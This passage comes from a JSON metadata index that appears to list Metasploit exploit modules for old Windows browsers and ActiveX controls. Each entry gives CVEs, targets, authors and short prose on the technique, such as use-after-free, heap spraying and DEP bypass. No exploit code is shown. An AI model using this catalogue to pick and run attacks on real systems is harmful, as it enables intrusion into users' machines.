"URL-https://www.mozilla.org/security/announce/2013/mfsa2013-53.html", - "URL-https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=901365", - "URL-http://krash.in/ffn0day.txt", - "URL-http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae" - ], - "platform": "Windows", - "arch": "", - "rport": null, - 
"autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Firefox 17 & Firefox 21 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_firefox_onreadystatechange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_firefox_xmlserializer": { - "name": "Firefox XMLSerializer Use After Free", - "fullname": "exploit/windows/browser/mozilla_firefox_xmlserializer", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-08", - "type": "exploit", - "author": [ - "regenrecht", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically\n a use-after-free of an Element object, when using the serializeToStream method\n with a specially crafted OutputStream defining its own write function. 
This module\n has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP\n SP3.", - "references": [ - "CVE-2013-0753", - "OSVDB-89021", - "BID-57209", - "ZDI-13-006", - "URL-http://www.mozilla.org/security/announce/2013/mfsa2013-16.html", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=814001" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Firefox 17 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_firefox_xmlserializer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_interleaved_write": { - "name": "Mozilla Firefox Interleaved document.write/appendChild Memory Corruption", - "fullname": "exploit/windows/browser/mozilla_interleaved_write", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-10-25", - "type": "exploit", - "author": [ - "unknown", - "scriptjunkie" - ], - "description": "This module exploits a code execution vulnerability in Mozilla\n Firefox caused by interleaved calls to document.write and appendChild.\n This module was written based on a live exploit found in the wild.", - "references": [ - "CVE-2010-3765", - "OSVDB-68905", - "BID-15352", - "EDB-15352", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=607222", - "URL-http://www.mozilla.org/security/announce/2010/mfsa2010-73.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_interleaved_write.rb", - "is_install_path": true, - "ref_name": 
"windows/browser/mozilla_interleaved_write", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_mchannel": { - "name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability", - "fullname": "exploit/windows/browser/mozilla_mchannel", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-10", - "type": "exploit", - "author": [ - "regenrecht", - "Rh0", - "mr_me " - ], - "description": "This module exploits a use after free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT Element mChannel can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECTs\n data attribute. (Discovered by regenrecht). This module uses heapspray\n with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay,\n a windows 7 target was provided using JAVA 6 and below to avoid aslr.", - "references": [ - "CVE-2011-0065", - "OSVDB-72085", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986", - "URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Firefox 3.6.16 on Windows XP SP3", - "Firefox 3.6.16 on Windows 7 + Java" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_mchannel.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_mchannel", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_nssvgvalue": { - "name": "Firefox nsSVGValue Out-of-Bounds Access Vulnerability", - "fullname": "exploit/windows/browser/mozilla_nssvgvalue", - "aliases": [], - "rank": 200, - "disclosure_date": 
"2011-12-06", - "type": "exploit", - "author": [ - "regenrecht", - "Lincoln ", - "corelanc0d3r " - ], - "description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\n The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\n uses a loop which can result in an out-of-bounds access to attacker-controlled memory.\n The mObserver ElementAt() function (which picks up pointers), does not validate\n if a given index is out of bound. If a custom observer of nsSVGValue is created,\n which removes elements from the original observer,\n and memory layout is manipulated properly, the ElementAt() function might pick up\n an attacker provided pointer, which can be leveraged to gain remote arbitrary\n code execution.", - "references": [ - "CVE-2011-3658", - "OSVDB-77953", - "ZDI-12-056", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708186" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP - Firefox 7", - "Windows XP - Firefox 8 (<= 8.0.1)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_nssvgvalue.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_nssvgvalue", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_nstreerange": { - "name": "Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability", - "fullname": "exploit/windows/browser/mozilla_nstreerange", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-02", - "type": "exploit", - "author": [ - "regenrecht", - "xero" - ], - "description": "This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to 
free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.", - "references": [ - "CVE-2011-0073", - "OSVDB-72087", - "BID-47663", - "ZDI-11-157", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=630919", - "URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Auto (Direct attack against Windows XP, otherwise through Java, if enabled)", - "Firefox Runtime, fails with ASLR", - "Java Runtime (7.10.3052.4), best against ASLR", - "Java JVM (20.1.0.02)", - "Java Regutils (6.0.260.3)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_nstreerange.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_nstreerange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_reduceright": { - "name": "Mozilla Firefox Array.reduceRight() Integer Overflow", - "fullname": "exploit/windows/browser/mozilla_reduceright", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-06-21", - "type": "exploit", - "author": [ - "Chris Rohlf", - "Yan Ivnitskiy", - "Matteo Memelli", - "dookie2000ca", - "sinn3r ", - "mr_me ", - "TecR0c " - ], - "description": "This module exploits a vulnerability found in Mozilla Firefox 3.6. 
When an\n array object is configured with a large length value, the reduceRight() method\n may cause an invalid index being used, allowing arbitrary remote code execution.\n Please note that the exploit requires a longer amount of time (compare to a\n typical browser exploit) in order to gain control of the machine.", - "references": [ - "CVE-2011-2371", - "OSVDB-73184", - "EDB-17974", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=664009" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Mozilla Firefox 3.6.16 (no JAVA)", - "Mozilla Firefox 3.6.16 (JAVA)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_reduceright.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_reduceright", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms03_020_ie_objecttype": { - "name": "MS03-020 Microsoft Internet Explorer Object Type", - "fullname": "exploit/windows/browser/ms03_020_ie_objecttype", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-06-04", - "type": "exploit", - "author": [ - "skape " - ], - "description": "This module exploits a vulnerability in Internet Explorer's\n handling of the OBJECT type attribute.", - "references": [ - "CVE-2003-0344", - "OSVDB-2967", - "BID-7806", - "MSB-MS03-020" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT/XP/2003 Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms03_020_ie_objecttype", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": null - }, - "exploit_windows/browser/ms05_054_onload": { - "name": "MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution", - "fullname": "exploit/windows/browser/ms05_054_onload", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-11-21", - "type": "exploit", - "author": [ - "Benjamin Tobias Franz", - "Stuart Pearson", - "Sam Sharps" - ], - "description": "This bug is triggered when the browser handles a JavaScript 'onLoad' handler in\n conjunction with an improperly initialized 'window()' JavaScript function.\n This exploit results in a call to an address lower than the heap. The javascript\n prompt() places our shellcode near where the call operand points to. We call\n prompt() multiple times in separate iframes to place our return address.\n We hide the prompts in a popup window behind the main window. We spray the heap\n a second time with our shellcode and point the return address to the heap. I use\n a fairly high address to make this exploit more reliable. IE will crash when the\n exploit completes. 
Also, please note that Internet Explorer must allow popups\n in order to continue exploitation.", - "references": [ - "MSB-MS05-054", - "CVE-2005-1790", - "OSVDB-17094", - "BID-13799" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Internet Explorer 6 on Windows XP", - "Internet Explorer 6 Windows 2000" - ], - "mod_time": "2021-04-05 13:03:42 +0000", - "path": "/modules/exploits/windows/browser/ms05_054_onload.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms05_054_onload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_001_wmf_setabortproc": { - "name": "Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution", - "fullname": "exploit/windows/browser/ms06_001_wmf_setabortproc", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-12-27", - "type": "exploit", - "author": [ - "hdm ", - "san ", - "O600KO78RUS " - ], - "description": "This module exploits a vulnerability in the GDI library included with\n Windows XP and 2003. This vulnerability uses the 'Escape' metafile function\n to execute arbitrary code through the SetAbortProc procedure. 
This module\n generates a random WMF record stream for each request.", - "references": [ - "CVE-2005-4560", - "OSVDB-21987", - "MSB-MS06-001", - "BID-16074", - "URL-http://wvware.sourceforge.net/caolan/ora-wmf.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP/2003/Vista Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_001_wmf_setabortproc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_013_createtextrange": { - "name": "MS06-013 Microsoft Internet Explorer createTextRange() Code Execution", - "fullname": "exploit/windows/browser/ms06_013_createtextrange", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-03-19", - "type": "exploit", - "author": [ - "Faithless ", - "Darkeagle ", - "hdm ", - "justfriends4n0w ", - "Unknown" - ], - "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer.\n Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under\n certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n to a very remote, non-existent memory location. This module is the result of merging three\n different exploit submissions and has only been reliably tested against Windows XP SP2.\n This vulnerability was independently discovered by multiple parties. 
The heap spray method\n used by this exploit was pioneered by Skylined.", - "references": [ - "CVE-2006-1359", - "OSVDB-24050", - "MSB-MS06-013", - "BID-17196", - "US-CERT-VU-876678", - "URL-http://web.archive.org/web/20060418044756/http://secunia.com:80/secunia_research/2006-7/advisory/", - "URL-https://seclists.org/lists/bugtraq/2006/Mar/0410.html", - "URL-https://seclists.org/lists/fulldisclosure/2006/Mar/1439.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)", - "Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/ms06_013_createtextrange.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_013_createtextrange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_055_vml_method": { - "name": "MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution", - "fullname": "exploit/windows/browser/ms06_055_vml_method", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-09-19", - "type": "exploit", - "author": [ - "hdm ", - "Aviv Raff ", - "Trirat Puttaraksa (Kira) ", - "Mr.Niega ", - "M. Shirk " - ], - "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer using\n a buffer overflow in the VML processing code (VGX.dll). 
This module has been tested on\n Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.", - "references": [ - "CVE-2006-4868", - "OSVDB-28946", - "MSB-MS06-055", - "BID-20096" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT 4.0 -> Windows 2003 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_055_vml_method.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_055_vml_method", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_057_webview_setslice": { - "name": "MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow", - "fullname": "exploit/windows/browser/ms06_057_webview_setslice", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-07-17", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a flaw in the WebViewFolderIcon ActiveX control\n included with Windows 2000, Windows XP, and Windows 2003. 
This flaw was published\n during the Month of Browser Bugs project (MoBB #18).", - "references": [ - "CVE-2006-3730", - "OSVDB-27110", - "MSB-MS06-057", - "BID-19030" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / IE 6.0SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_057_webview_setslice.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_057_webview_setslice", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_067_keyframe": { - "name": "MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability", - "fullname": "exploit/windows/browser/ms06_067_keyframe", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-11-14", - "type": "exploit", - "author": [ - "Alexander Sotirov ", - "skape " - ], - "description": "This module exploits a heap overflow vulnerability in the KeyFrame method of the\n direct animation ActiveX control. 
This is a port of the exploit implemented by\n Alexander Sotirov.", - "references": [ - "CVE-2006-4777", - "OSVDB-28842", - "BID-20047", - "MSB-MS06-067" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000/XP/2003 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_067_keyframe.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_067_keyframe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_071_xml_core": { - "name": "MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling", - "fullname": "exploit/windows/browser/ms06_071_xml_core", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-10-10", - "type": "exploit", - "author": [ - "Trirat Puttaraksa " - ], - "description": "This module exploits a code execution vulnerability in Microsoft XML Core Services which\n exists in the XMLHTTP ActiveX control. This module is the modified version of\n http://www.milw0rm.com/exploits/2743 - credit to str0ke. 
This module has been successfully\n tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n + Microsoft XML Core Services 4.0 SP2.", - "references": [ - "CVE-2006-5745", - "OSVDB-29425", - "MSB-MS06-071", - "BID-20915" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 -> Windows 2003 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_071_xml_core.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_071_xml_core", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms07_017_ani_loadimage_chunksize": { - "name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)", - "fullname": "exploit/windows/browser/ms07_017_ani_loadimage_chunksize", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-03-28", - "type": "exploit", - "author": [ - "hdm ", - "skape ", - "Solar Eclipse " - ], - "description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function in USER32.dll. The flaw can be triggered through\n Internet Explorer 6 and 7 by using the CURSOR style sheet directive\n to load a malicious .ANI file. The module can also exploit Mozilla\n Firefox by using a UNC path in a moz-icon URL and serving the .ANI file\n over WebDAV. 
The vulnerable code in USER32.dll will catch any\n exceptions that occur while the invalid cursor is loaded, causing the\n exploit to silently fail when the wrong target has been chosen.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.", - "references": [ - "CVE-2007-0038", - "OSVDB-33629", - "BID-23194", - "MSB-MS07-017" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista", - "IE6 on Windows NT, 2000, XP, 2003 (all languages)", - "IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)", - "IE7 and Firefox on Windows Vista (all languages)", - "Firefox on Windows XP (English)", - "Firefox on Windows 2003 (English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms07_017_ani_loadimage_chunksize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms08_041_snapshotviewer": { - "name": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download", - "fullname": "exploit/windows/browser/ms08_041_snapshotviewer", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-07-07", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Microsoft Office Snapshot Viewer ActiveX Control.", - "references": [ - "CVE-2008-2463", - "OSVDB-46749", - "MSB-MS08-041", - "BID-30114" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
"/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms08_041_snapshotviewer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms08_053_mediaencoder": { - "name": "Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/ms08_053_mediaencoder", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-09-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Windows Media Encoder 9. When\n sending an overly long string to the GetDetailsString() method of wmex.dll\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-3008", - "OSVDB-47962", - "BID-31065", - "MSB-MS08-053" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2-SP3 IE 6.0 SP0-SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms08_053_mediaencoder.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms08_053_mediaencoder", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms08_070_visual_studio_msmask": { - "name": "Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/ms08_070_visual_studio_msmask", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-08-13", - "type": "exploit", - "author": [ - "koshi", - "MC " - ], - "description": "This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n When passing a specially crafted string to the Mask parameter of the\n Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n 
code.", - "references": [ - "CVE-2008-3704", - "OSVDB-47475", - "BID-30674", - "MSB-MS08-070" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 IE 6.0 SP0-SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms08_070_visual_studio_msmask", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms08_078_xml_corruption": { - "name": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption", - "fullname": "exploit/windows/browser/ms08_078_xml_corruption", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-12-07", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a vulnerability in the data binding feature of Internet\n Explorer. In order to execute code reliably, this module uses the .NET DLL\n memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n used to create a fake vtable at a known location with all methods pointing\n to our payload. 
Since the .text segment of the .NET DLL is non-writable, a\n prefixed code stub is used to copy the payload into a new memory segment and\n continue execution from there.", - "references": [ - "CVE-2008-4844", - "OSVDB-50622", - "BID-32721", - "MSB-MS08-078", - "URL-https://web.archive.org/web/20080913064223/http://taossa.com/archive/bh08sotirovdowd.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms08_078_xml_corruption.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms08_078_xml_corruption", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms09_002_memory_corruption": { - "name": "MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption", - "fullname": "exploit/windows/browser/ms09_002_memory_corruption", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-10", - "type": "exploit", - "author": [ - "dean " - ], - "description": "This module exploits an error related to the CFunctionPointer function when attempting\n to access uninitialized memory. 
A remote attacker could exploit this vulnerability to\n corrupt memory and execute arbitrary code on the system with the privileges of the victim.", - "references": [ - "CVE-2009-0075", - "OSVDB-51839", - "MSB-MS09-002" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2-SP3 / Windows Vista SP0 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms09_002_memory_corruption.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms09_002_memory_corruption", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms09_043_owc_htmlurl": { - "name": "Microsoft OWC Spreadsheet HTMLURL Buffer Overflow", - "fullname": "exploit/windows/browser/ms09_043_owc_htmlurl", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-08-11", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a buffer overflow in Microsoft's Office Web Components.\n When passing an overly long string as the \"HTMLURL\" parameter an attacker can\n execute arbitrary code.", - "references": [ - "CVE-2009-1534", - "OSVDB-56916", - "BID-35992", - "MSB-MS09-043", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 - IE6 - Office XP SP0", - "Windows XP SP3 - IE6 - Office XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms09_043_owc_htmlurl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/browser/ms09_043_owc_msdso": { - "name": "Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption", - "fullname": "exploit/windows/browser/ms09_043_owc_msdso", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-07-13", - "type": "exploit", - "author": [ - "unknown", - "hdm ", - "Ahmed Obied", - "DSR! " - ], - "description": "This module exploits a memory corruption vulnerability within versions 10 and 11 of\n the Office Web Component Spreadsheet ActiveX control. This module was based on\n an exploit found in the wild.", - "references": [ - "CVE-2009-1136", - "OSVDB-55806", - "MSB-MS09-043", - "URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py", - "EDB-9163", - "URL-https://web.archive.org/web/20090716143635/http://xeye.us/blog/2009/07/one-0day/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms09_043_owc_msdso.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms09_043_owc_msdso", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms09_072_style_object": { - "name": "MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption", - "fullname": "exploit/windows/browser/ms09_072_style_object", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-11-20", - "type": "exploit", - "author": [ - "securitylab.ir ", - "jduck " - ], - "description": "This module exploits a vulnerability in the getElementsByTagName function\n as implemented within Internet Explorer.", - "references": [ - "MSB-MS09-072", - "CVE-2009-3672", - "OSVDB-50622", - "BID-37085", - "URL-https://web.archive.org/web/20090316061713/http://taossa.com/archive/bh08sotirovdowd.pdf" - ], - 
